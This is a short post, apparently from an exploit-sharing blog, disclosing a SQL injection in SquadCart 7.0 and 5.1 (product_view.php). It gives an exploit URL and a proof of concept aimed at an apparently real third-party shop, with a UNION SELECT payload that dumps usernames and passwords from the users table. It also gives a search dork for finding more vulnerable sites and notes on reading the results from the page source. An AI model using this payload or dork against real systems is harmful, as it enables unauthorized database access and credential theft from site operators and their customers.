LFI to RCE via access_log injection

on
18

SquadCart SQL Injection Vuln

on 

[o] SquadCart 7.0 and 5.1 SQL Injection Vulnerability
Software : SquadCart version 7.0 and 5.1
Vendor   : http://thewebsquad.net/
Author   : NoGe


[o] Vulnerable file
product_view.php


[o] Exploit
http://localhost/[path]/product_view.php?proid=[SQL]


[o] Proof Of Concept
http://shoveabitch.com/shove-a-bitch-t-shirts/SquadCart/product_view.php?prodid=326+AND+1=2+UNION+SELECT+group_concat(username,0x3a,password),1,2,3+from+info_users--


[o] Dork
"Powered by acap" or inurl:squadcart


[o] Note
private shop script again. -_-
if there is no result or error show, you need to view page source


Comments

Post a Comment